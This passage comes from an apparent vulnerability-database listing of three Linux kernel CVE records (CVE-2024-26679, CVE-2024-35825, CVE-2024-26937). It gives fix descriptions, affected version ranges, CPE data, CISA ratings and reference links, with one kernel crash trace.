"version": "f4713a3dfad045d46afcb9c2a7d0bba288920ed4",
"versionType": "git"
},
{
"lessThan": "4a5e31bdd3c1702b520506d9cf8c41085f75c7f2",
"status": "affected",
"version": "f4713a3dfad045d46afcb9c2a7d0bba288920ed4",
"versionType": "git"
},
{
"lessThan": "307fa8a75ab7423fa5c73573ec3d192de5027830",
"status": "affected",
"version": "f4713a3dfad045d46afcb9c2a7d0bba288920ed4",
"versionType": "git"
},
{
"lessThan": "eef00a82c568944f113f2de738156ac591bbd5cd",
"status": "affected",
"version": "f4713a3dfad045d46afcb9c2a7d0bba288920ed4",
"versionType": "git"
},
{
"status": "affected",
"version": "433337f9c00cac447d020922f59237273f5d92be",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/ipv4/af_inet.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.18"
},
{
"lessThan": "3.18",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.307",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.78",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.17",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.5",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.307",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.269",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.78",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.17",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.5",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "3.17.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ninet: read sk-\u003esk_family once in inet_recv_error()\n\ninet_recv_error() is called without holding the socket lock.\n\nIPv6 socket could mutate to IPv4 with IPV6_ADDRFORM\nsocket option and trigger a KCSAN warning."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:54:25.209Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/caa064c3c2394d03e289ebd6b0be5102eb8a5b40"
},
{
"url": "https://git.kernel.org/stable/c/5993f121fbc01dc2d734f0ff2628009b258fb1dd"
},
{
"url": "https://git.kernel.org/stable/c/88081ba415224cf413101def4343d660f56d082b"
},
{
"url": "https://git.kernel.org/stable/c/3266e638ba5cc1165f5e6989eb8c0720f1cc4b41"
},
{
"url": "https://git.kernel.org/stable/c/54538752216bf89ee88d47ad07802063a498c299"
},
{
"url": "https://git.kernel.org/stable/c/4a5e31bdd3c1702b520506d9cf8c41085f75c7f2"
},
{
"url": "https://git.kernel.org/stable/c/307fa8a75ab7423fa5c73573ec3d192de5027830"
},
{
"url": "https://git.kernel.org/stable/c/eef00a82c568944f113f2de738156ac591bbd5cd"
}
],
"title": "inet: read sk-\u003esk_family once in inet_recv_error()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26679",
"datePublished": "2024-04-02T07:01:43.133Z",
"dateReserved": "2024-02-19T14:20:24.152Z",
"dateUpdated": "2025-05-04T12:54:25.209Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35825 (GCVE-0-2024-35825)
Vulnerability from cvelistv5
Published
2024-05-17 13:27
Modified
2025-05-04 12:55
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
usb: gadget: ncm: Fix handling of zero block length packets
While connecting to a Linux host with CDC_NCM_NTB_DEF_SIZE_TX
set to 65536, it has been observed that we receive short packets,
which come at interval of 5-10 seconds sometimes and have block
length zero but still contain 1-2 valid datagrams present.
According to the NCM spec:
"If wBlockLength = 0x0000, the block is terminated by a
short packet. In this case, the USB transfer must still
be shorter than dwNtbInMaxSize or dwNtbOutMaxSize. If
exactly dwNtbInMaxSize or dwNtbOutMaxSize bytes are sent,
and the size is a multiple of wMaxPacketSize for the
given pipe, then no ZLP shall be sent.
wBlockLength= 0x0000 must be used with extreme care, because
of the possibility that the host and device may get out of
sync, and because of test issues.
wBlockLength = 0x0000 allows the sender to reduce latency by
starting to send a very large NTB, and then shortening it when
the sender discovers that there’s not sufficient data to justify
sending a large NTB"
However, there is a potential issue with the current implementation,
as it checks for the occurrence of multiple NTBs in a single
giveback by verifying if the leftover bytes to be processed is zero
or not. If the block length reads zero, we would process the same
NTB infintely because the leftover bytes is never zero and it leads
to a crash. Fix this by bailing out if block length reads zero.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: ff3ba016263ee93a1c6209bf5ab1599de7ab1512 Version: e7ca00f35d8a17af1ae19d529193ebc21bfda164 Version: 17c653d4913bbc50d284aa96cf12bfc63e41ee5c Version: 7014807fb7efa169a47a7a0a0a41d2c513925de0 Version: 49fbc18378ae72a47feabee97fdb86f3cea09765 Version: 427694cfaafa565a3db5c5ea71df6bc095dca92f Version: 427694cfaafa565a3db5c5ea71df6bc095dca92f Version: 427694cfaafa565a3db5c5ea71df6bc095dca92f Version: 5bdf93a2f5459f944b416b188178ca4a92fd206f Version: 4bf1a9d20c65b9e80ca4b171267103f8d4f2c61f |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:47.690Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e2dbfea520e60d58e0c498ba41bde10452257779"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a766761d206e7c36d7526e0ae749949d17ca582c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ef846cdbd100f7f9dc045e8bcd7fe4b3a3713c03"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/92b051b87658df7649ffcdef522593f21a2b296b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7664ee8bd80309b90d53488b619764f0a057f2b7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a0f77b5d6067285b8eca0ee3bd1e448a6258026f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6b2c73111a252263807b7598682663dc33aa4b4c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f90ce1e04cbcc76639d6cba0fdbd820cd80b3c70"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35825",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:42:28.954371Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:21.446Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/usb/gadget/function/f_ncm.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "e2dbfea520e60d58e0c498ba41bde10452257779",
"status": "affected",
"version": "ff3ba016263ee93a1c6209bf5ab1599de7ab1512",
"versionType": "git"
},
{
"lessThan": "a766761d206e7c36d7526e0ae749949d17ca582c",
"status": "affected",
"version": "e7ca00f35d8a17af1ae19d529193ebc21bfda164",
"versionType": "git"
},
{
"lessThan": "ef846cdbd100f7f9dc045e8bcd7fe4b3a3713c03",
"status": "affected",
"version": "17c653d4913bbc50d284aa96cf12bfc63e41ee5c",
"versionType": "git"
},
{
"lessThan": "92b051b87658df7649ffcdef522593f21a2b296b",
"status": "affected",
"version": "7014807fb7efa169a47a7a0a0a41d2c513925de0",
"versionType": "git"
},
{
"lessThan": "7664ee8bd80309b90d53488b619764f0a057f2b7",
"status": "affected",
"version": "49fbc18378ae72a47feabee97fdb86f3cea09765",
"versionType": "git"
},
{
"lessThan": "a0f77b5d6067285b8eca0ee3bd1e448a6258026f",
"status": "affected",
"version": "427694cfaafa565a3db5c5ea71df6bc095dca92f",
"versionType": "git"
},
{
"lessThan": "6b2c73111a252263807b7598682663dc33aa4b4c",
"status": "affected",
"version": "427694cfaafa565a3db5c5ea71df6bc095dca92f",
"versionType": "git"
},
{
"lessThan": "f90ce1e04cbcc76639d6cba0fdbd820cd80b3c70",
"status": "affected",
"version": "427694cfaafa565a3db5c5ea71df6bc095dca92f",
"versionType": "git"
},
{
"status": "affected",
"version": "5bdf93a2f5459f944b416b188178ca4a92fd206f",
"versionType": "git"
},
{
"status": "affected",
"version": "4bf1a9d20c65b9e80ca4b171267103f8d4f2c61f",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/usb/gadget/function/f_ncm.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.6"
},
{
"lessThan": "6.6",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.312",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.84",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.24",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.312",
"versionStartIncluding": "4.19.297",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"versionStartIncluding": "5.4.259",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "5.10.199",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "5.15.136",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.84",
"versionStartIncluding": "6.1.59",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.24",
"versionStartIncluding": "6.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.12",
"versionStartIncluding": "6.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "6.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.14.328",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.5.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: gadget: ncm: Fix handling of zero block length packets\n\nWhile connecting to a Linux host with CDC_NCM_NTB_DEF_SIZE_TX\nset to 65536, it has been observed that we receive short packets,\nwhich come at interval of 5-10 seconds sometimes and have block\nlength zero but still contain 1-2 valid datagrams present.\n\nAccording to the NCM spec:\n\n\"If wBlockLength = 0x0000, the block is terminated by a\nshort packet. In this case, the USB transfer must still\nbe shorter than dwNtbInMaxSize or dwNtbOutMaxSize. If\nexactly dwNtbInMaxSize or dwNtbOutMaxSize bytes are sent,\nand the size is a multiple of wMaxPacketSize for the\ngiven pipe, then no ZLP shall be sent.\n\nwBlockLength= 0x0000 must be used with extreme care, because\nof the possibility that the host and device may get out of\nsync, and because of test issues.\n\nwBlockLength = 0x0000 allows the sender to reduce latency by\nstarting to send a very large NTB, and then shortening it when\nthe sender discovers that there\u2019s not sufficient data to justify\nsending a large NTB\"\n\nHowever, there is a potential issue with the current implementation,\nas it checks for the occurrence of multiple NTBs in a single\ngiveback by verifying if the leftover bytes to be processed is zero\nor not. If the block length reads zero, we would process the same\nNTB infintely because the leftover bytes is never zero and it leads\nto a crash. Fix this by bailing out if block length reads zero."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:55:50.991Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/e2dbfea520e60d58e0c498ba41bde10452257779"
},
{
"url": "https://git.kernel.org/stable/c/a766761d206e7c36d7526e0ae749949d17ca582c"
},
{
"url": "https://git.kernel.org/stable/c/ef846cdbd100f7f9dc045e8bcd7fe4b3a3713c03"
},
{
"url": "https://git.kernel.org/stable/c/92b051b87658df7649ffcdef522593f21a2b296b"
},
{
"url": "https://git.kernel.org/stable/c/7664ee8bd80309b90d53488b619764f0a057f2b7"
},
{
"url": "https://git.kernel.org/stable/c/a0f77b5d6067285b8eca0ee3bd1e448a6258026f"
},
{
"url": "https://git.kernel.org/stable/c/6b2c73111a252263807b7598682663dc33aa4b4c"
},
{
"url": "https://git.kernel.org/stable/c/f90ce1e04cbcc76639d6cba0fdbd820cd80b3c70"
}
],
"title": "usb: gadget: ncm: Fix handling of zero block length packets",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35825",
"datePublished": "2024-05-17T13:27:28.914Z",
"dateReserved": "2024-05-17T12:19:12.347Z",
"dateUpdated": "2025-05-04T12:55:50.991Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26937 (GCVE-0-2024-26937)
Vulnerability from cvelistv5
Published
2024-05-01 05:17
Modified
2025-05-04 09:00
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/i915/gt: Reset queue_priority_hint on parking
Originally, with strict in order execution, we could complete execution
only when the queue was empty. Preempt-to-busy allows replacement of an
active request that may complete before the preemption is processed by
HW. If that happens, the request is retired from the queue, but the
queue_priority_hint remains set, preventing direct submission until
after the next CS interrupt is processed.
This preempt-to-busy race can be triggered by the heartbeat, which will
also act as the power-management barrier and upon completion allow us to
idle the HW. We may process the completion of the heartbeat, and begin
parking the engine before the CS event that restores the
queue_priority_hint, causing us to fail the assertion that it is MIN.
<3>[ 166.210729] __engine_park:283 GEM_BUG_ON(engine->sched_engine->queue_priority_hint != (-((int)(~0U >> 1)) - 1))
<0>[ 166.210781] Dumping ftrace buffer:
<0>[ 166.210795] ---------------------------------
...
<0>[ 167.302811] drm_fdin-1097 2..s1. 165741070us : trace_ports: 0000:00:02.0 rcs0: promote { ccid:20 1217:2 prio 0 }
<0>[ 167.302861] drm_fdin-1097 2d.s2. 165741072us : execlists_submission_tasklet: 0000:00:02.0 rcs0: preempting last=1217:2, prio=0, hint=2147483646
<0>[ 167.302928] drm_fdin-1097 2d.s2. 165741072us : __i915_request_unsubmit: 0000:00:02.0 rcs0: fence 1217:2, current 0
<0>[ 167.302992] drm_fdin-1097 2d.s2. 165741073us : __i915_request_submit: 0000:00:02.0 rcs0: fence 3:4660, current 4659
<0>[ 167.303044] drm_fdin-1097 2d.s1. 165741076us : execlists_submission_tasklet: 0000:00:02.0 rcs0: context:3 schedule-in, ccid:40
<0>[ 167.303095] drm_fdin-1097 2d.s1. 165741077us : trace_ports: 0000:00:02.0 rcs0: submit { ccid:40 3:4660* prio 2147483646 }
<0>[ 167.303159] kworker/-89 11..... 165741139us : i915_request_retire.part.0: 0000:00:02.0 rcs0: fence c90:2, current 2
<0>[ 167.303208] kworker/-89 11..... 165741148us : __intel_context_do_unpin: 0000:00:02.0 rcs0: context:c90 unpin
<0>[ 167.303272] kworker/-89 11..... 165741159us : i915_request_retire.part.0: 0000:00:02.0 rcs0: fence 1217:2, current 2
<0>[ 167.303321] kworker/-89 11..... 165741166us : __intel_context_do_unpin: 0000:00:02.0 rcs0: context:1217 unpin
<0>[ 167.303384] kworker/-89 11..... 165741170us : i915_request_retire.part.0: 0000:00:02.0 rcs0: fence 3:4660, current 4660
<0>[ 167.303434] kworker/-89 11d..1. 165741172us : __intel_context_retire: 0000:00:02.0 rcs0: context:1216 retire runtime: { total:56028ns, avg:56028ns }
<0>[ 167.303484] kworker/-89 11..... 165741198us : __engine_park: 0000:00:02.0 rcs0: parked
<0>[ 167.303534] <idle>-0 5d.H3. 165741207us : execlists_irq_handler: 0000:00:02.0 rcs0: semaphore yield: 00000040
<0>[ 167.303583] kworker/-89 11..... 165741397us : __intel_context_retire: 0000:00:02.0 rcs0: context:1217 retire runtime: { total:325575ns, avg:0ns }
<0>[ 167.303756] kworker/-89 11..... 165741777us : __intel_context_retire: 0000:00:02.0 rcs0: context:c90 retire runtime: { total:0ns, avg:0ns }
<0>[ 167.303806] kworker/-89 11..... 165742017us : __engine_park: __engine_park:283 GEM_BUG_ON(engine->sched_engine->queue_priority_hint != (-((int)(~0U >> 1)) - 1))
<0>[ 167.303811] ---------------------------------
<4>[ 167.304722] ------------[ cut here ]------------
<2>[ 167.304725] kernel BUG at drivers/gpu/drm/i915/gt/intel_engine_pm.c:283!
<4>[ 167.304731] invalid opcode: 0000 [#1] PREEMPT SMP NOPTI
<4>[ 167.304734] CPU: 11 PID: 89 Comm: kworker/11:1 Tainted: G W 6.8.0-rc2-CI_DRM_14193-gc655e0fd2804+ #1
<4>[ 167.304736] Hardware name: Intel Corporation Rocket Lake Client Platform/RocketLake S UDIMM 6L RVP, BIOS RKLSFWI1.R00.3173.A03.2204210138 04/21/2022
<4>[ 167.304738] Workqueue: i915-unordered retire_work_handler [i915]
<4>[ 16
---truncated---
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 22b7a426bbe1ebe1520f92da4cd1617d1e1b5fc4 Version: 22b7a426bbe1ebe1520f92da4cd1617d1e1b5fc4 Version: 22b7a426bbe1ebe1520f92da4cd1617d1e1b5fc4 Version: 22b7a426bbe1ebe1520f92da4cd1617d1e1b5fc4 Version: 22b7a426bbe1ebe1520f92da4cd1617d1e1b5fc4 Version: 22b7a426bbe1ebe1520f92da4cd1617d1e1b5fc4 Version: 22b7a426bbe1ebe1520f92da4cd1617d1e1b5fc4 Version: 22b7a426bbe1ebe1520f92da4cd1617d1e1b5fc4 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26937",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-10T18:35:30.171766Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-05T17:22:50.154Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.613Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/67944e6db656bf1e986aa2a359f866f851091f8a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fe34587acc995e7b1d7a5d3444a0736721ec32b3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ac9b6b3e8d1237136c8ebf0fa1ce037dd7e2948f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7eab7b021835ae422c38b968d5cc60e99408fb62"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3b031e4fcb2740988143c303f81f69f18ce86325"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/aed034866a08bb7e6e34d50a5629a4d23fe83703"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8fd9b0ce8c26533fe4d5d15ea15bbf7b904b611c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4a3859ea5240365d21f6053ee219bb240d520895"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/i915/gt/intel_engine_pm.c",
"drivers/gpu/drm/i915/gt/intel_execlists_submission.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "67944e6db656bf1e986aa2a359f866f851091f8a",
"status": "affected",
"version": "22b7a426bbe1ebe1520f92da4cd1617d1e1b5fc4",
"versionType": "git"
},
{
"lessThan": "fe34587acc995e7b1d7a5d3444a0736721ec32b3",
"status": "affected",
"version": "22b7a426bbe1ebe1520f92da4cd1617d1e1b5fc4",
"versionType": "git"
},
{
"lessThan": "ac9b6b3e8d1237136c8ebf0fa1ce037dd7e2948f",
"status": "affected",
"version": "22b7a426bbe1ebe1520f92da4cd1617d1e1b5fc4",
"versionType": "git"
},
{
"lessThan": "7eab7b021835ae422c38b968d5cc60e99408fb62",
"status": "affected",
"version": "22b7a426bbe1ebe1520f92da4cd1617d1e1b5fc4",
"versionType": "git"
},
{
"lessThan": "3b031e4fcb2740988143c303f81f69f18ce86325",
"status": "affected",
"version": "22b7a426bbe1ebe1520f92da4cd1617d1e1b5fc4",
"versionType": "git"
},
{
"lessThan": "aed034866a08bb7e6e34d50a5629a4d23fe83703",
"status": "affected",
"version": "22b7a426bbe1ebe1520f92da4cd1617d1e1b5fc4",
"versionType": "git"
},
{
"lessThan": "8fd9b0ce8c26533fe4d5d15ea15bbf7b904b611c",
"status": "affected",
"version": "22b7a426bbe1ebe1520f92da4cd1617d1e1b5fc4",
"versionType": "git"
},
{
"lessThan": "4a3859ea5240365d21f6053ee219bb240d520895",
"status": "affected",
"version": "22b7a426bbe1ebe1520f92da4cd1617d1e1b5fc4",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/i915/gt/intel_engine_pm.c",
"drivers/gpu/drm/i915/gt/intel_execlists_submission.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.4"
},
{
"lessThan": "5.4",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.84",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.24",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.84",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.24",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.12",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.3",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/i915/gt: Reset queue_priority_hint on parking\n\nOriginally, with strict in order execution, we could complete execution\nonly when the queue was empty. Preempt-to-busy allows replacement of an\nactive request that may complete before the preemption is processed by\nHW. If that happens, the request is retired from the queue, but the\nqueue_priority_hint remains set, preventing direct submission until\nafter the next CS interrupt is processed.\n\nThis preempt-to-busy race can be triggered by the heartbeat, which will\nalso act as the power-management barrier and upon completion allow us to\nidle the HW. We may process the completion of the heartbeat, and begin\nparking the engine before the CS event that restores the\nqueue_priority_hint, causing us to fail the assertion that it is MIN.\n\n\u003c3\u003e[ 166.210729] __engine_park:283 GEM_BUG_ON(engine-\u003esched_engine-\u003equeue_priority_hint != (-((int)(~0U \u003e\u003e 